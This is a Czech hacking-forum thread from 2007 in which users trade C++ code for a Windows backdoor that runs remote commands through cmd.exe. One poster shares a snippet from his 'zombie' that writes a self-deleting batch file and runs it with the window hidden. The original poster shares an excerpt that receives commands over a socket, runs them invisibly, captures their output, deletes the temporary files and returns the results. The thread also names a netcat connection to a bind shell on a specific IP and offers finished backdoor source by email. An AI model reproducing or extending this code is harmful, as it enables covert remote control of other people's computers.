Backdoor / cmd.exe

HackForum

Backdoor / cmd.exe #
Peace, jsem mirne pokrocily v c++, umim cosi uz naprogramovat...ale vubec me nenapada jak udelat toto:

Mam rozepsanej backdoor, nemam s tim problem, sockety jsem celkem zvladnul, spojeni v pohode navazu.Ale jak udelat abych mu poslal prikaz (rekneme treba >

#cmdline 1234

)
a on mi otevrel na porte 1234 cmd.exe na ktery bych se pripojil (nc 215.123.235.42 1234)
Verim ze toto neni tak tezke{ale ani lehke}, tak snad nekdo dokaze poradit ;)

A prosím, nepište nic jako "google lamo", spíš by mi(treba i vic lidem) pomohlo kdyby někdo napsal radsi kus okomentovany kodu.thx
(odpovědět)
rOnalD | 217.160.72.*26.9.2007 18:27
re: Backdoor / cmd.exe #
Musíš použít prostředníka, to bude tvůj program, bude vykonávat příkazy do soketu vstupující a výstup bude posílat zpátky. Nemůžeš nabindovat spojení přímo přes CMD (když už tak na to je služba telnet).
(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797626.9.2007 18:37
re: Backdoor / cmd.exe #
Ano, vsak tak jsem to myslel, bind ci pipe nebo jak se tomu rika.Ale rikal jsem at radsi sem hodis nejaky kod, uplne co nejjednodusi, aby to aspon trochu fungovalo ;)
Hlavne ne jako system(prikaz); hehe...
(odpovědět)
rOnalD | 217.160.72.*26.9.2007 18:53
re: Backdoor / cmd.exe #
Ve svy zombii pouzivam tenhle kus kodu, ktery umoznuje spoustet i shell prikazy na pozadi, pokud bychom chteli okno zobrazit, dame na zacatek prikazu 'start'. Toto narozdil od normalniho shell_exec umoznuje neviditelne spoustet i prikazy pro cmdcko, ale nadruhou stranu to neblokuje dalsi vykonavani programu, ukazalo se to jako rychle a nejlepsi reseni po hodinach googleni:


char snd[] = "echo lol > lol.txt"; //Nejaky prikaz
char cmdfile[] = "zzzcommands.bat"; //Docasny soubor
////////////////////NEJAKY_KOD
FILE *cmdf = fopen(cmdfile, "w");
fprintf(cmdf, "%s\ndel %s\n", snd, cmdfile);
fclose(cmdf);

WinExec(cmdfile,SW_HIDE); //Hide console window
//system(cmdfile); //Show console window


----------
Harvie's blog: [link] g33k-shop: [link] fs: [link]
Registered GNU/LINUX user #468114 [link]

(odpovědět)
Harvie | E-mail | Website | ICQ 28378297827.9.2007 16:57
re: Backdoor / cmd.exe #
/*
Toto je výňatek z mého backdooru, který má rozsah asi 15 stran zdrojáků, tady na začátku je iniciazace serveru apod., to už si snad někde najdeš jak se dělá

Tu dám nejdůležitější definice proměnných:
*/
#define BUFSIZE 1024
#define EXECFILENAME exec.bat
#define BUFFILENAME dump.txt
...
char buf[BUFSIZE];
FILE *fh;
string clientCMD;
string returnData;
...
SHELLEXECUTEINFO sh;
ZeroMemory(&sh, sizeof(SHELLEXECUTEINFO));
sh.cbSize = sizeof(SHELLEXECUTEINFO);
sh.lpFile = EXECFILENAME;
sh.nShow = SW_HIDE;
sh.fMask = SEE_MASK_NOCLOSEPROCESS;
... bind serveru, příjde spojení a už je to tady, příkaz je v prom clientCMD
fh = fopen(EXECFILENAME, "wb");
fprintf(fh, "@echo off\r\n%s> %s\r\nexit", clientCMD.c_str(), BUFFILENAME);
fclose(fh);
if (ShellExecuteEx(&sh)) // Splodíme proces a počkáme si na jeho smrt :))
{
if (WaitForSingleObject(sh.hProcess, 2000) != WAIT_FAILED) // Čeká se max 2s
{
fh = fopen(BUFFILENAME, "rb");
while (fgets(buf, BUFSIZE - 1, fh) != NULL)
{
returnData += buf;
}
fclose(fh);
DeleteFile(EXECFILENAME);
DeleteFile(BUFFILENAME);
}
else
{
returnData = "Executing command overrange timeout!";
}
}
else
{
returnData = "Executing command get failed!";
}
... // Tady se vrací výstup zpátky do soketu z prom. returnData, následně se soket uzavírá a čeká se na další spojení

(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797626.9.2007 19:55
re: Backdoor / cmd.exe #
Hmmm....diky, taky by to tak slo,ale treba netcat asi nepracuje na tomto principu.Nebo ano ? Vytvari taky
soubory a spousti prikazy pres hajdnutej batak ?
(odpovědět)
r0nalD | 217.160.72.*26.9.2007 20:13
re: Backdoor / cmd.exe #
To asi ne, mě se toto řešení taky hrozně příčilo, ale pak jsem nenašel žádné jiné nenašel. Kdyby někdo měl inteligentnější způsob, tak sem s ním.
(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797626.9.2007 20:21
re: Backdoor / cmd.exe #
Muzes pouzit - jak jsi jiz rekl - roury (pipes)... neco je o nich treba tady:
[link]
nebo se zkus tky mrknout na msdn... [link]

Btw delal jsem s tim ve vb6, kdyztak prepsat to do c++ by nemel bejt problem
(odpovědět)
Petroff | 213.29.48.*26.9.2007 21:27
re: Backdoor / cmd.exe #
nejmenuje: dobrej zdrojak :) (bez ironie)
(odpovědět)
( | ) | 85.132.198.*26.9.2007 22:50
re: Backdoor / cmd.exe #
Zdarec, taky pracuju na backdoor, jeden uz mam hotovy ale je psany trochu jinak, veskere operace jako prace se souborovym systemem, vysilani chybovych hlasek, download a upload souboru je implementovan rucne pomovi WIN32API, zatim mam funkcni verzi kde je server v konzole a pracuji na verzi kde je server aplikace s okny. Zdrojaky tady sirit nebudu ale pokud by mel nekdo zajem tak napiste na arab3h@seznam.cz
(odpovědět)
Arab3h | 147.229.176.*27.9.2007 18:04
re: Backdoor / cmd.exe #
Arab3h taxe podivey na ten meil ,)
(odpovědět)
ph0 | 213.19.63.*27.9.2007 20:11

Zpět
 
 
 

 
BBCode